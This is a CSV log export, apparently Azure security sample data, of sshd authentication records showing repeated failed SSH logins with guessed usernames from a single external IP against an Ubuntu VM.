+19545,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:03:20,UbuntuDevEnv,2019-06-06 18:03:20,auth,UbuntuDevEnv,info,Invalid user deploy from 128.199.149.61 port 43548,9745,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deploy,128.199.149.6,43548,,
+19546,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:03:21,UbuntuDevEnv,2019-06-06 18:03:20,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 43548:11: Normal Shutdown, Thank you for playing [preauth]",9745,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,43548,,
+19547,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:03:21,UbuntuDevEnv,2019-06-06 18:03:20,auth,UbuntuDevEnv,info,Disconnected from invalid user deploy 128.199.149.61 port 43548 [preauth],9745,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deploy,128.199.149.6,43548,,
+19548,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:03:27,UbuntuDevEnv,2019-06-06 18:03:27,auth,UbuntuDevEnv,info,Invalid user deploy from 128.199.149.61 port 48172,9756,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deploy,128.199.149.6,48172,,
+19549,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:03:27,UbuntuDevEnv,2019-06-06 18:03:27,auth,UbuntuDevEnv,info,Disconnected from invalid user deploy 128.199.149.61 port 48172 [preauth],9756,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deploy,128.199.149.6,48172,,
+19550,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:03:27,UbuntuDevEnv,2019-06-06 18:03:27,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 48172:11: Normal Shutdown, Thank you for playing [preauth]",9756,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,48172,,
+19551,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:03:34,UbuntuDevEnv,2019-06-06 18:03:33,auth,UbuntuDevEnv,info,Invalid user postgres from 128.199.149.61 port 52810,9767,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postgres,128.199.149.6,52810,,
+19552,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:03:34,UbuntuDevEnv,2019-06-06 18:03:33,auth,UbuntuDevEnv,info,Disconnected from invalid user postgres 128.199.149.61 port 52810 [preauth],9767,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postgres,128.199.149.6,52810,,
+19553,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:03:34,UbuntuDevEnv,2019-06-06 18:03:33,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 52810:11: Normal Shutdown, Thank you for playing [preauth]",9767,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,52810,,
+19554,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:03:40,UbuntuDevEnv,2019-06-06 18:03:40,auth,UbuntuDevEnv,info,Invalid user nagios from 128.199.149.61 port 57420,9774,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,128.199.149.6,57420,,
+19555,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:03:41,UbuntuDevEnv,2019-06-06 18:03:40,auth,UbuntuDevEnv,info,Disconnected from invalid user nagios 128.199.149.61 port 57420 [preauth],9774,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,128.199.149.6,57420,,
+19556,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:03:41,UbuntuDevEnv,2019-06-06 18:03:40,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 57420:11: Normal Shutdown, Thank you for playing [preauth]",9774,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,57420,,
+19557,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:03:47,UbuntuDevEnv,2019-06-06 18:03:47,auth,UbuntuDevEnv,info,Invalid user jenkins from 128.199.149.61 port 33804,9785,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jenkins,128.199.149.6,33804,,
+19558,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:03:48,UbuntuDevEnv,2019-06-06 18:03:47,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 33804:11: Normal Shutdown, Thank you for playing [preauth]",9785,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,33804,,
+19559,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:03:48,UbuntuDevEnv,2019-06-06 18:03:47,auth,UbuntuDevEnv,info,Disconnected from invalid user jenkins 128.199.149.61 port 33804 [preauth],9785,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jenkins,128.199.149.6,33804,,
+19560,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:03:53,UbuntuDevEnv,2019-06-06 18:03:53,auth,UbuntuDevEnv,info,Invalid user jenkins1 from 128.199.149.61 port 38432,9800,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jenkins1,128.199.149.6,38432,,
+19561,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:03:53,UbuntuDevEnv,2019-06-06 18:03:53,auth,UbuntuDevEnv,info,Disconnected from invalid user jenkins1 128.199.149.61 port 38432 [preauth],9800,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jenkins1,128.199.149.6,38432,,
+19562,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:03:53,UbuntuDevEnv,2019-06-06 18:03:53,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 38432:11: Normal Shutdown, Thank you for playing [preauth]",9800,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,38432,,
+19563,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:04:00,UbuntuDevEnv,2019-06-06 18:04:00,auth,UbuntuDevEnv,info,Invalid user vagrant from 128.199.149.61 port 43078,9815,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vagrant,128.199.149.6,43078,,
+19564,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:04:00,UbuntuDevEnv,2019-06-06 18:04:00,auth,UbuntuDevEnv,info,Disconnected from invalid user vagrant 128.199.149.61 port 43078 [preauth],9815,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vagrant,128.199.149.6,43078,,
+19565,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:04:00,UbuntuDevEnv,2019-06-06 18:04:00,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 43078:11: Normal Shutdown, Thank you for playing [preauth]",9815,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,43078,,
+19566,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:04:07,UbuntuDevEnv,2019-06-06 18:04:07,auth,UbuntuDevEnv,info,Invalid user apache from 128.199.149.61 port 47676,9823,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,apache,128.199.149.6,47676,,
+19567,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:04:07,UbuntuDevEnv,2019-06-06 18:04:07,auth,UbuntuDevEnv,info,Disconnected from invalid user apache 128.199.149.61 port 47676 [preauth],9823,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,apache,128.199.149.6,47676,,
+19568,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:04:07,UbuntuDevEnv,2019-06-06 18:04:07,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 47676:11: Normal Shutdown, Thank you for playing [preauth]",9823,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,47676,,
+19569,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:04:14,UbuntuDevEnv,2019-06-06 18:04:14,auth,UbuntuDevEnv,info,Invalid user appserver from 128.199.149.61 port 52296,9842,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,appserver,128.199.149.6,52296,,
+19570,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:04:14,UbuntuDevEnv,2019-06-06 18:04:14,auth,UbuntuDevEnv,info,Disconnected from invalid user appserver 128.199.149.61 port 52296 [preauth],9842,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,appserver,128.199.149.6,52296,,
+19571,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:04:14,UbuntuDevEnv,2019-06-06 18:04:14,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 52296:11: Normal Shutdown, Thank you for playing [preauth]",9842,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,52296,,
+19572,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:04:21,UbuntuDevEnv,2019-06-06 18:04:20,auth,UbuntuDevEnv,info,Invalid user csgoserver from 128.199.149.61 port 56922,9852,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,csgoserver,128.199.149.6,56922,,
+19573,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:04:21,UbuntuDevEnv,2019-06-06 18:04:20,auth,UbuntuDevEnv,info,Disconnected from invalid user csgoserver 128.199.149.61 port 56922 [preauth],9852,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,csgoserver,128.199.149.6,56922,,
+19574,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:04:21,UbuntuDevEnv,2019-06-06 18:04:20,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 56922:11: Normal Shutdown, Thank you for playing [preauth]",9852,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,56922,,
+19575,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:04:27,UbuntuDevEnv,2019-06-06 18:04:27,auth,UbuntuDevEnv,info,Invalid user minecraft from 128.199.149.61 port 33312,9863,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,minecraft,128.199.149.6,33312,,
+19576,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:04:27,UbuntuDevEnv,2019-06-06 18:04:27,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 33312:11: Normal Shutdown, Thank you for playing [preauth]",9863,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,33312,,
+19577,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:04:27,UbuntuDevEnv,2019-06-06 18:04:27,auth,UbuntuDevEnv,info,Disconnected from invalid user minecraft 128.199.149.61 port 33312 [preauth],9863,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,minecraft,128.199.149.6,33312,,
+19578,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:04:34,UbuntuDevEnv,2019-06-06 18:04:34,auth,UbuntuDevEnv,info,Invalid user omn from 128.199.149.61 port 37932,9875,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,omn,128.199.149.6,37932,,
+19579,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:04:34,UbuntuDevEnv,2019-06-06 18:04:34,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 37932:11: Normal Shutdown, Thank you for playing [preauth]",9875,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,37932,,
+19580,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:04:34,UbuntuDevEnv,2019-06-06 18:04:34,auth,UbuntuDevEnv,info,Disconnected from invalid user omn 128.199.149.61 port 37932 [preauth],9875,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,omn,128.199.149.6,37932,,
+19581,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:04:41,UbuntuDevEnv,2019-06-06 18:04:40,auth,UbuntuDevEnv,info,Invalid user odoo from 128.199.149.61 port 42554,9881,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,odoo,128.199.149.6,42554,,
+19582,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:04:41,UbuntuDevEnv,2019-06-06 18:04:40,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 42554:11: Normal Shutdown, Thank you for playing [preauth]",9881,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,42554,,
+19583,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:04:41,UbuntuDevEnv,2019-06-06 18:04:40,auth,UbuntuDevEnv,info,Disconnected from invalid user odoo 128.199.149.61 port 42554 [preauth],9881,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,odoo,128.199.149.6,42554,,
+19584,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:04:48,UbuntuDevEnv,2019-06-06 18:04:47,auth,UbuntuDevEnv,info,Invalid user odoo1 from 128.199.149.61 port 47178,9892,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,odoo1,128.199.149.6,47178,,
+19585,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:04:48,UbuntuDevEnv,2019-06-06 18:04:48,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 47178:11: Normal Shutdown, Thank you for playing [preauth]",9892,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,47178,,
+19586,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:04:48,UbuntuDevEnv,2019-06-06 18:04:48,auth,UbuntuDevEnv,info,Disconnected from invalid user odoo1 128.199.149.61 port 47178 [preauth],9892,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,odoo1,128.199.149.6,47178,,
+19587,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:04:55,UbuntuDevEnv,2019-06-06 18:04:55,auth,UbuntuDevEnv,info,Invalid user hadoop from 128.199.149.61 port 51816,9911,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hadoop,128.199.149.6,51816,,
+19588,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:04:55,UbuntuDevEnv,2019-06-06 18:04:55,auth,UbuntuDevEnv,info,Disconnected from invalid user hadoop 128.199.149.61 port 51816 [preauth],9911,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hadoop,128.199.149.6,51816,,
+19589,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:04:55,UbuntuDevEnv,2019-06-06 18:04:55,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 51816:11: Normal Shutdown, Thank you for playing [preauth]",9911,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,51816,,
+19590,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:05:02,UbuntuDevEnv,2019-06-06 18:05:01,auth,UbuntuDevEnv,info,Invalid user admin from 128.199.149.61 port 56420,9922,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,128.199.149.6,56420,,
+19591,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:05:02,UbuntuDevEnv,2019-06-06 18:05:01,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 128.199.149.61 port 56420 [preauth],9922,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,128.199.149.6,56420,,
+19592,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:05:02,UbuntuDevEnv,2019-06-06 18:05:01,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 56420:11: Normal Shutdown, Thank you for playing [preauth]",9922,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,56420,,
+19593,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:05:09,UbuntuDevEnv,2019-06-06 18:05:08,auth,UbuntuDevEnv,info,Invalid user marc from 128.199.149.61 port 32832,9937,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,marc,128.199.149.6,32832,,
+19594,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:05:09,UbuntuDevEnv,2019-06-06 18:05:09,auth,UbuntuDevEnv,info,Disconnected from invalid user marc 128.199.149.61 port 32832 [preauth],9937,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,marc,128.199.149.6,32832,,
+19595,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:05:09,UbuntuDevEnv,2019-06-06 18:05:09,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 32832:11: Normal Shutdown, Thank you for playing [preauth]",9937,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,32832,,
+19596,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:05:15,UbuntuDevEnv,2019-06-06 18:05:15,auth,UbuntuDevEnv,info,Invalid user marco from 128.199.149.61 port 37438,9956,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,marco,128.199.149.6,37438,,
+19597,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:05:16,UbuntuDevEnv,2019-06-06 18:05:15,auth,UbuntuDevEnv,info,Disconnected from invalid user marco 128.199.149.61 port 37438 [preauth],9956,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,marco,128.199.149.6,37438,,
+19598,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:05:16,UbuntuDevEnv,2019-06-06 18:05:15,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 37438:11: Normal Shutdown, Thank you for playing [preauth]",9956,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,37438,,
+19599,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:05:23,UbuntuDevEnv,2019-06-06 18:05:22,auth,UbuntuDevEnv,info,Invalid user teamspeak from 128.199.149.61 port 42060,9962,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teamspeak,128.199.149.6,42060,,
+19600,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:05:23,UbuntuDevEnv,2019-06-06 18:05:22,auth,UbuntuDevEnv,info,Disconnected from invalid user teamspeak 128.199.149.61 port 42060 [preauth],9962,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teamspeak,128.199.149.6,42060,,
+19601,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:05:23,UbuntuDevEnv,2019-06-06 18:05:22,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 42060:11: Normal Shutdown, Thank you for playing [preauth]",9962,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,42060,,
+19602,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:05:29,UbuntuDevEnv,2019-06-06 18:05:29,auth,UbuntuDevEnv,info,Invalid user teamspeak3 from 128.199.149.61 port 46682,9978,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teamspeak3,128.199.149.6,46682,,
+19603,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:05:30,UbuntuDevEnv,2019-06-06 18:05:29,auth,UbuntuDevEnv,info,Disconnected from invalid user teamspeak3 128.199.149.61 port 46682 [preauth],9978,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teamspeak3,128.199.149.6,46682,,
